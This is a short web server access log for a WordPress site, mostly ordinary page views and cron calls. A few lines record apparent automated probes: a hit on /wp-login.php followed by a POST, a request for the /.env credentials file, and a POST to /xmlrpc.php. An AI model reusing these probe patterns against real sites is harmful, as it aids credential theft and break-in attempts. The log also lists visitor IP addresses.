117.83.122.38 - - [26/Nov/2025:20:59:32 +0800] "GET / HTTP/1.1" 301 5 "http://www.cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
117.83.122.38 - - [26/Nov/2025:20:59:32 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 33988 "http://www.cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
60.220.135.177 - - [26/Nov/2025:21:00:30 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 33988 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
60.220.135.177 - - [26/Nov/2025:21:00:44 +0800] "GET http://cqqizhou.com/contacts/ HTTP/1.1" 200 21606 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
60.220.135.177 - - [26/Nov/2025:21:00:44 +0800] "GET http://cqqizhou.com/ HTTP/1.1" 200 33988 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
60.220.135.177 - - [26/Nov/2025:21:00:45 +0800] "GET http://cqqizhou.com/contacts/ HTTP/1.1" 200 21606 "http://cqqizhou.com/contacts/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
163.204.106.140 - - [26/Nov/2025:21:01:12 +0800] "GET http://cqqizhou.com/contacts/ HTTP/1.1" 200 21606 "http://www.cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
163.204.106.140 - - [26/Nov/2025:21:01:14 +0800] "GET http://cqqizhou.com/contacts/ HTTP/1.1" 200 21606 "http://cqqizhou.com/contacts/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
36.133.115.36 - - [26/Nov/2025:21:03:15 +0800] "POST /wp-cron.php?doing_wp_cron=1764162195.6111650466918945312500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
8.218.212.177 - - [26/Nov/2025:21:03:15 +0800] "GET /wp-login.php HTTP/1.1" 200 2783 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
8.218.212.177 - - [26/Nov/2025:21:03:16 +0800] "POST /wp-login.php HTTP/1.1" 200 2921 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [26/Nov/2025:21:05:18 +0800] "POST /wp-cron.php?doing_wp_cron=1764162318.0056738853454589843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
94.26.88.18 - - [26/Nov/2025:21:05:18 +0800] "GET /.env HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG SM-T530NU Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.2 Chrome/38.0.2125.102 Safari/537.36"
36.133.115.36 - - [26/Nov/2025:21:07:53 +0800] "POST /wp-cron.php?doing_wp_cron=1764162473.3802149295806884765625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
18.219.78.174 - - [26/Nov/2025:21:07:53 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0"
